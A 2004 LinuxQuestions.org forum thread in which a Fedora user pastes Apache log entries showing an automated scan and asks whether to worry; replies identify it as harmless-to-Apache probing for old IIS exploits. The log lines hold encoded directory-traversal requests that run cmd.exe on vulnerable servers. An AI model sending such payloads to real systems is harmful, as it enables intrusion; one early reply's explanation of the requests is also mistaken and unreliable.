LinuxQuestions.org

LinuxQuestions.org (/questions/)
-   Linux - Newbie (https://www.linuxquestions.org/questions/linux-newbie-8/)
-   -   should i be concerned (https://www.linuxquestions.org/questions/linux-newbie-8/should-i-be-concerned-138903/)

Zaius 01-26-2004 02:11 PM
should i be concerned
 
this is a log from my apache logs.

24.0.77.100 - - [26/Jan/2004:02:19:47 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 299
24.0.77.100 - - [26/Jan/2004:02:19:50 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 297
24.0.77.100 - - [26/Jan/2004:02:19:53 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
24.0.77.100 - - [26/Jan/2004:02:19:56 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
24.0.77.100 - - [26/Jan/2004:02:20:00 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321
24.0.77.100 - - [26/Jan/2004:02:20:03 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 338
24.0.77.100 - - [26/Jan/2004:02:20:06 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 338
24.0.77.100 - - [26/Jan/2004:02:20:09 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 354 24.0.77.100 - - [26/Jan/2004:02:20:12 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320
24.0.77.100 - - [26/Jan/2004:02:20:25 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 311
24.0.77.100 - - [26/Jan/2004:02:20:35 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 311
24.0.77.100 - - [26/Jan/2004:02:20:38 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321
24.0.77.100 - - [26/Jan/2004:02:20:41 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321

should i be concerned that someone is 'trying' to find what could be important files, if this were a windows machine.

what constituts as something i should take action towards? this guys not too bright obviously.. but still.. does snooping around like this happen often?

other question.. can i block my own ip from being logged? as 80% or more of the log is either my cable IP, eth0 IP or loopback's IP.. so it would be nice if i just saw what other people were doing.

chrisk5527 01-26-2004 02:25 PM
It doesnt look like someone is snooping around your system. The reason why I say this is because it looks like there is access to a scripts directory through your web server setup. A script might be executing cmd.exe to run correctly. I'm not sure what software your using as your web server, but to my knowledge, I dont believe you can omit your own IP address from a log.

Khabi 01-26-2004 02:35 PM
No, you really don't need to be worried about it. They're scanning for IIS exploits, they really don't apply to you :)
I run a webserver and get that alot, its mostly just script-kiddies looking around for an *easy hack*. Maybe jot down the ip that the scan came from and keep an eye out for other scans from the same general IP address. If it gets to be a problem bring it up w/ the ISP.
If you start seeing apache specific exploits then you should start being a little more worried. Just keep an eye on your secure and message log files for unusal stuff.

All in all your fine tho. You'll probably see alot more of those.

Zaius 01-26-2004 02:40 PM
ok thanks..

although i don't have a scripts folder within my webpage directory.. so that's why i was wondering why they're be trying to look for something in there..

i am using apache2 on fedora linux.


All times are GMT -5. The time now is 02:07 PM.